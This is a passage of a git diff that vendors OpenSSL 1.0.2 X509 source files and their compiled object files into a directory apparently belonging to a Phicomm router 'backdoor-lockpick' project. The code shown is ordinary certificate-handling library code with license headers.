+int X509_REQ_add_extensions_nid(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts,
+                                int nid)
+{
+    ASN1_TYPE *at = NULL;
+    X509_ATTRIBUTE *attr = NULL;
+    if (!(at = ASN1_TYPE_new()) || !(at->value.sequence = ASN1_STRING_new()))
+        goto err;
+
+    at->type = V_ASN1_SEQUENCE;
+    /* Generate encoding of extensions */
+    at->value.sequence->length =
+        ASN1_item_i2d((ASN1_VALUE *)exts,
+                      &at->value.sequence->data,
+                      ASN1_ITEM_rptr(X509_EXTENSIONS));
+    if (!(attr = X509_ATTRIBUTE_new()))
+        goto err;
+    if (!(attr->value.set = sk_ASN1_TYPE_new_null()))
+        goto err;
+    if (!sk_ASN1_TYPE_push(attr->value.set, at))
+        goto err;
+    at = NULL;
+    attr->single = 0;
+    attr->object = OBJ_nid2obj(nid);
+    if (!req->req_info->attributes) {
+        if (!(req->req_info->attributes = sk_X509_ATTRIBUTE_new_null()))
+            goto err;
+    }
+    if (!sk_X509_ATTRIBUTE_push(req->req_info->attributes, attr))
+        goto err;
+    return 1;
+ err:
+    X509_ATTRIBUTE_free(attr);
+    ASN1_TYPE_free(at);
+    return 0;
+}
+
+/* This is the normal usage: use the "official" OID */
+int X509_REQ_add_extensions(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts)
+{
+    return X509_REQ_add_extensions_nid(req, exts, NID_ext_req);
+}
+
+/* Request attribute functions */
+
+int X509_REQ_get_attr_count(const X509_REQ *req)
+{
+    return X509at_get_attr_count(req->req_info->attributes);
+}
+
+int X509_REQ_get_attr_by_NID(const X509_REQ *req, int nid, int lastpos)
+{
+    return X509at_get_attr_by_NID(req->req_info->attributes, nid, lastpos);
+}
+
+int X509_REQ_get_attr_by_OBJ(const X509_REQ *req, ASN1_OBJECT *obj,
+                             int lastpos)
+{
+    return X509at_get_attr_by_OBJ(req->req_info->attributes, obj, lastpos);
+}
+
+X509_ATTRIBUTE *X509_REQ_get_attr(const X509_REQ *req, int loc)
+{
+    return X509at_get_attr(req->req_info->attributes, loc);
+}
+
+X509_ATTRIBUTE *X509_REQ_delete_attr(X509_REQ *req, int loc)
+{
+    return X509at_delete_attr(req->req_info->attributes, loc);
+}
+
+int X509_REQ_add1_attr(X509_REQ *req, X509_ATTRIBUTE *attr)
+{
+    if (X509at_add1_attr(&req->req_info->attributes, attr))
+        return 1;
+    return 0;
+}
+
+int X509_REQ_add1_attr_by_OBJ(X509_REQ *req,
+                              const ASN1_OBJECT *obj, int type,
+                              const unsigned char *bytes, int len)
+{
+    if (X509at_add1_attr_by_OBJ(&req->req_info->attributes, obj,
+                                type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int X509_REQ_add1_attr_by_NID(X509_REQ *req,
+                              int nid, int type,
+                              const unsigned char *bytes, int len)
+{
+    if (X509at_add1_attr_by_NID(&req->req_info->attributes, nid,
+                                type, bytes, len))
+        return 1;
+    return 0;
+}
+
+int X509_REQ_add1_attr_by_txt(X509_REQ *req,
+                              const char *attrname, int type,
+                              const unsigned char *bytes, int len)
+{
+    if (X509at_add1_attr_by_txt(&req->req_info->attributes, attrname,
+                                type, bytes, len))
+        return 1;
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_req.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_req.o
new file mode 100644
index 0000000000000000000000000000000000000000..64d20c96f926b293acd19fd0aaa3773be45fdb17
GIT binary patch
literal 7352
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
Z6-O}~r;>hgn^g0Uhym^^DV>bl|KD$cY6k!S

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_set.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_set.c
new file mode 100644
index 0000000..5b802bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_set.c
@@ -0,0 +1,152 @@
+/* crypto/x509/x509_set.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+int X509_set_version(X509 *x, long version)
+{
+    if (x == NULL)
+        return (0);
+    if (version == 0) {
+        M_ASN1_INTEGER_free(x->cert_info->version);
+        x->cert_info->version = NULL;
+        return (1);
+    }
+    if (x->cert_info->version == NULL) {
+        if ((x->cert_info->version = M_ASN1_INTEGER_new()) == NULL)
+            return (0);
+    }
+    return (ASN1_INTEGER_set(x->cert_info->version, version));
+}
+
+int X509_set_serialNumber(X509 *x, ASN1_INTEGER *serial)
+{
+    ASN1_INTEGER *in;
+
+    if (x == NULL)
+        return (0);
+    in = x->cert_info->serialNumber;
+    if (in != serial) {
+        in = M_ASN1_INTEGER_dup(serial);
+        if (in != NULL) {
+            M_ASN1_INTEGER_free(x->cert_info->serialNumber);
+            x->cert_info->serialNumber = in;
+        }
+    }
+    return (in != NULL);
+}
+
+int X509_set_issuer_name(X509 *x, X509_NAME *name)
+{
+    if ((x == NULL) || (x->cert_info == NULL))
+        return (0);
+    return (X509_NAME_set(&x->cert_info->issuer, name));
+}
+
+int X509_set_subject_name(X509 *x, X509_NAME *name)
+{
+    if ((x == NULL) || (x->cert_info == NULL))
+        return (0);
+    return (X509_NAME_set(&x->cert_info->subject, name));
+}
+
+int X509_set_notBefore(X509 *x, const ASN1_TIME *tm)
+{
+    ASN1_TIME *in;
+
+    if ((x == NULL) || (x->cert_info->validity == NULL))
+        return (0);
+    in = x->cert_info->validity->notBefore;
+    if (in != tm) {
+        in = M_ASN1_TIME_dup(tm);
+        if (in != NULL) {
+            M_ASN1_TIME_free(x->cert_info->validity->notBefore);
+            x->cert_info->validity->notBefore = in;
+        }
+    }
+    return (in != NULL);
+}
+
+int X509_set_notAfter(X509 *x, const ASN1_TIME *tm)
+{
+    ASN1_TIME *in;
+
+    if ((x == NULL) || (x->cert_info->validity == NULL))
+        return (0);
+    in = x->cert_info->validity->notAfter;
+    if (in != tm) {
+        in = M_ASN1_TIME_dup(tm);
+        if (in != NULL) {
+            M_ASN1_TIME_free(x->cert_info->validity->notAfter);
+            x->cert_info->validity->notAfter = in;
+        }
+    }
+    return (in != NULL);
+}
+
+int X509_set_pubkey(X509 *x, EVP_PKEY *pkey)
+{
+    if ((x == NULL) || (x->cert_info == NULL))
+        return (0);
+    return (X509_PUBKEY_set(&(x->cert_info->key), pkey));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_set.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_set.o
new file mode 100644
index 0000000000000000000000000000000000000000..d87baadb00c2ecdc7c922fc6349761501fd30e3e
GIT binary patch
literal 3112
zcmb`IUuauZ9LG<ZYO}3NvnexDm4HPv<}S%L|8xx3n>Eetnq^y?;A|~-Np@@7HEFy#
zccwn*pmq@A!yX*?B)$wL_#pTqz8Hu)ggs0VRPbSs6aRpS6Z}_yzjJ>lJ-H?z;(?p<
zJD>CWeSg1m&&j#3B-0apJ|C0K$DU?eBS{&%9oVwRggM4`vO)Iq&_ll&8=HJt&(0Y2
z-;MR}!|BGOlZ_)I#>O3I&uw%y8h+!th<P8Szk31$b|Y;(WvqV`p3|TE7N<Y#gCC>L
zM*<WEma);CtoM&NpT(Qx+KM+@GOM05>c3##(?(;!7_9{O!$$pAH@f~Y#PWMYnwnJf
z8}-EiNNxNuJ2!NtIj@TCG8#v*vTert^{^;N$)rw3)kzfF<fn7(DjKIE$Uf(zP@6G&
zfbaE`biXKRECQ=<zn%sR>rqh{lr=jy-x6zd#j{<+j|g!)!1sC7huiAPqJ=yyT-C?Y
z)s@BM%2?{yvBQyQuHclp6B*SGYO($CCmk`2zkDF3#SZOtF>V~Ret1Ig+yzf6lVh-z
zO=Ny}u-)r+%=gkX^VLGW;lY8xWjGCofImQU7qFiShF<H_gW+|5Dj0iVdoZlGf}zBX
zU?91p2m`Q#0ljr23a(j-JAwW2VCYicIL3_!Bew7yN6$~(x-OFMgVbZKuX`A3UL!V-
zeHt}IEuh(F2vOY?Mc*&T_bm3EzEi3%=8}IZnIBQNhJTQL_S0s!IlmO~O#0hzxpTrV
zcBPZy$j|QnClq|32M_e%xZ9m=5Qe*zI>nv>!*z@I(CN+&_Tb|^c&-Ou299}UK5-_1
zUF_k1nfzPOW0U)G73^+xz6TujZ$Xbu`hN;G@;?P-Y@YgWh|khxdY1T)#6KV|b^Ze0
zEibD*9vd~Q7T1dG44LKy%dRf1mYJDKpG@d!^W?<DOfqX`^+Y;pGJPf!H)pcblbMvc
zU|W_8CNtS&Dmjf(9UgqGVwq*@#Vz%!WiRDdGES*r*&VLuoXVEhQnl(>wpq@XEEi_<
z6G@@oF0<+smaQUJd?2}5UgZgEVb!KELiz%SZ0*pBQ#fy}x#Ls0#8mQGA<bBX-Xq>E
zJK*_a({0Zve5b;%D11oaZ!28YiPFBHzUqHe;i~^7g{%H=DqQt9l)U&~k@bJA@LdYO
z(}Uks^!F(K5%R}RDL%5DAwzQcKY7)|<^SOg55Gm@cRXC4`>#A)p8I~PQ|6WDo@v#!
z63-W)=eFA~O3SuZ@*1~loN4FsJkPX3waT>OYN=$Efx!W?H2B8sukw8HJdK|(J6gqF
ztynf+W13K~7UB5g@%%qp1VnHt-kWm_7`88Io$jc8-OC{x1`E&BSev-UyCfK)`0aqv
zls9ge{2w7Mzo&%Red;DlNWRLDJq82R{IBtG(u}F1V9WgbJY2pG*&n8Oj~h$;%leN)
zAby>^?goK~M_9f;i3?z0E#CM=0wGx_1$g7}UhlSlH|djkjpA_sFjmIP{p*$+Lu#}k
oQK|#)ifvuuk$LwH5POS0!9h>`o*~0KrCWTB3SB`lrFrB32IS!F!vFvP

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_trs.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_trs.c
new file mode 100644
index 0000000..11e0763
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_trs.c
@@ -0,0 +1,318 @@
+/* x509_trs.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509v3.h>
+
+static int tr_cmp(const X509_TRUST *const *a, const X509_TRUST *const *b);
+static void trtable_free(X509_TRUST *p);
+
+static int trust_1oidany(X509_TRUST *trust, X509 *x, int flags);
+static int trust_1oid(X509_TRUST *trust, X509 *x, int flags);
+static int trust_compat(X509_TRUST *trust, X509 *x, int flags);
+
+static int obj_trust(int id, X509 *x, int flags);
+static int (*default_trust) (int id, X509 *x, int flags) = obj_trust;
+
+/*
+ * WARNING: the following table should be kept in order of trust and without
+ * any gaps so we can just subtract the minimum trust value to get an index
+ * into the table
+ */
+
+static X509_TRUST trstandard[] = {
+    {X509_TRUST_COMPAT, 0, trust_compat, "compatible", 0, NULL},
+    {X509_TRUST_SSL_CLIENT, 0, trust_1oidany, "SSL Client", NID_client_auth,
+     NULL},
+    {X509_TRUST_SSL_SERVER, 0, trust_1oidany, "SSL Server", NID_server_auth,
+     NULL},
+    {X509_TRUST_EMAIL, 0, trust_1oidany, "S/MIME email", NID_email_protect,
+     NULL},
+    {X509_TRUST_OBJECT_SIGN, 0, trust_1oidany, "Object Signer", NID_code_sign,
+     NULL},
+    {X509_TRUST_OCSP_SIGN, 0, trust_1oid, "OCSP responder", NID_OCSP_sign,
+     NULL},
+    {X509_TRUST_OCSP_REQUEST, 0, trust_1oid, "OCSP request", NID_ad_OCSP,
+     NULL},
+    {X509_TRUST_TSA, 0, trust_1oidany, "TSA server", NID_time_stamp, NULL}
+};
+
+#define X509_TRUST_COUNT        (sizeof(trstandard)/sizeof(X509_TRUST))
+
+IMPLEMENT_STACK_OF(X509_TRUST)
+
+static STACK_OF(X509_TRUST) *trtable = NULL;
+
+static int tr_cmp(const X509_TRUST *const *a, const X509_TRUST *const *b)
+{
+    return (*a)->trust - (*b)->trust;
+}
+
+int (*X509_TRUST_set_default(int (*trust) (int, X509 *, int))) (int, X509 *,
+                                                                int) {
+    int (*oldtrust) (int, X509 *, int);
+    oldtrust = default_trust;
+    default_trust = trust;
+    return oldtrust;
+}
+
+int X509_check_trust(X509 *x, int id, int flags)
+{
+    X509_TRUST *pt;
+    int idx;
+    if (id == -1)
+        return 1;
+    /* We get this as a default value */
+    if (id == 0) {
+        int rv;
+        rv = obj_trust(NID_anyExtendedKeyUsage, x, 0);
+        if (rv != X509_TRUST_UNTRUSTED)
+            return rv;
+        return trust_compat(NULL, x, 0);
+    }
+    idx = X509_TRUST_get_by_id(id);
+    if (idx == -1)
+        return default_trust(id, x, flags);
+    pt = X509_TRUST_get0(idx);
+    return pt->check_trust(pt, x, flags);
+}
+
+int X509_TRUST_get_count(void)
+{
+    if (!trtable)
+        return X509_TRUST_COUNT;
+    return sk_X509_TRUST_num(trtable) + X509_TRUST_COUNT;
+}
+
+X509_TRUST *X509_TRUST_get0(int idx)
+{
+    if (idx < 0)
+        return NULL;
+    if (idx < (int)X509_TRUST_COUNT)
+        return trstandard + idx;
+    return sk_X509_TRUST_value(trtable, idx - X509_TRUST_COUNT);
+}
+
+int X509_TRUST_get_by_id(int id)
+{
+    X509_TRUST tmp;
+    int idx;
+    if ((id >= X509_TRUST_MIN) && (id <= X509_TRUST_MAX))
+        return id - X509_TRUST_MIN;
+    tmp.trust = id;
+    if (!trtable)
+        return -1;
+    idx = sk_X509_TRUST_find(trtable, &tmp);
+    if (idx == -1)
+        return -1;
+    return idx + X509_TRUST_COUNT;
+}
+
+int X509_TRUST_set(int *t, int trust)
+{
+    if (X509_TRUST_get_by_id(trust) == -1) {
+        X509err(X509_F_X509_TRUST_SET, X509_R_INVALID_TRUST);
+        return 0;
+    }
+    *t = trust;
+    return 1;
+}
+
+int X509_TRUST_add(int id, int flags, int (*ck) (X509_TRUST *, X509 *, int),
+                   char *name, int arg1, void *arg2)
+{
+    int idx;
+    X509_TRUST *trtmp;
+    /*
+     * This is set according to what we change: application can't set it
+     */
+    flags &= ~X509_TRUST_DYNAMIC;
+    /* This will always be set for application modified trust entries */
+    flags |= X509_TRUST_DYNAMIC_NAME;
+    /* Get existing entry if any */
+    idx = X509_TRUST_get_by_id(id);
+    /* Need a new entry */
+    if (idx == -1) {
+        if (!(trtmp = OPENSSL_malloc(sizeof(X509_TRUST)))) {
+            X509err(X509_F_X509_TRUST_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        trtmp->flags = X509_TRUST_DYNAMIC;
+    } else
+        trtmp = X509_TRUST_get0(idx);
+
+    /* OPENSSL_free existing name if dynamic */
+    if (trtmp->flags & X509_TRUST_DYNAMIC_NAME)
+        OPENSSL_free(trtmp->name);
+    /* dup supplied name */
+    if (!(trtmp->name = BUF_strdup(name))) {
+        X509err(X509_F_X509_TRUST_ADD, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    /* Keep the dynamic flag of existing entry */
+    trtmp->flags &= X509_TRUST_DYNAMIC;
+    /* Set all other flags */
+    trtmp->flags |= flags;
+
+    trtmp->trust = id;
+    trtmp->check_trust = ck;
+    trtmp->arg1 = arg1;
+    trtmp->arg2 = arg2;
+
+    /* If its a new entry manage the dynamic table */
+    if (idx == -1) {
+        if (!trtable && !(trtable = sk_X509_TRUST_new(tr_cmp))) {
+            X509err(X509_F_X509_TRUST_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        if (!sk_X509_TRUST_push(trtable, trtmp)) {
+            X509err(X509_F_X509_TRUST_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+static void trtable_free(X509_TRUST *p)
+{
+    if (!p)
+        return;
+    if (p->flags & X509_TRUST_DYNAMIC) {
+        if (p->flags & X509_TRUST_DYNAMIC_NAME)
+            OPENSSL_free(p->name);
+        OPENSSL_free(p);
+    }
+}
+
+void X509_TRUST_cleanup(void)
+{
+    unsigned int i;
+    for (i = 0; i < X509_TRUST_COUNT; i++)
+        trtable_free(trstandard + i);
+    sk_X509_TRUST_pop_free(trtable, trtable_free);
+    trtable = NULL;
+}
+
+int X509_TRUST_get_flags(X509_TRUST *xp)
+{
+    return xp->flags;
+}
+
+char *X509_TRUST_get0_name(X509_TRUST *xp)
+{
+    return xp->name;
+}
+
+int X509_TRUST_get_trust(X509_TRUST *xp)
+{
+    return xp->trust;
+}
+
+static int trust_1oidany(X509_TRUST *trust, X509 *x, int flags)
+{
+    if (x->aux && (x->aux->trust || x->aux->reject))
+        return obj_trust(trust->arg1, x, flags);
+    /*
+     * we don't have any trust settings: for compatibility we return trusted
+     * if it is self signed
+     */
+    return trust_compat(trust, x, flags);
+}
+
+static int trust_1oid(X509_TRUST *trust, X509 *x, int flags)
+{
+    if (x->aux)
+        return obj_trust(trust->arg1, x, flags);
+    return X509_TRUST_UNTRUSTED;
+}
+
+static int trust_compat(X509_TRUST *trust, X509 *x, int flags)
+{
+    X509_check_purpose(x, -1, 0);
+    if (x->ex_flags & EXFLAG_SS)
+        return X509_TRUST_TRUSTED;
+    else
+        return X509_TRUST_UNTRUSTED;
+}
+
+static int obj_trust(int id, X509 *x, int flags)
+{
+    ASN1_OBJECT *obj;
+    int i;
+    X509_CERT_AUX *ax;
+    ax = x->aux;
+    if (!ax)
+        return X509_TRUST_UNTRUSTED;
+    if (ax->reject) {
+        for (i = 0; i < sk_ASN1_OBJECT_num(ax->reject); i++) {
+            obj = sk_ASN1_OBJECT_value(ax->reject, i);
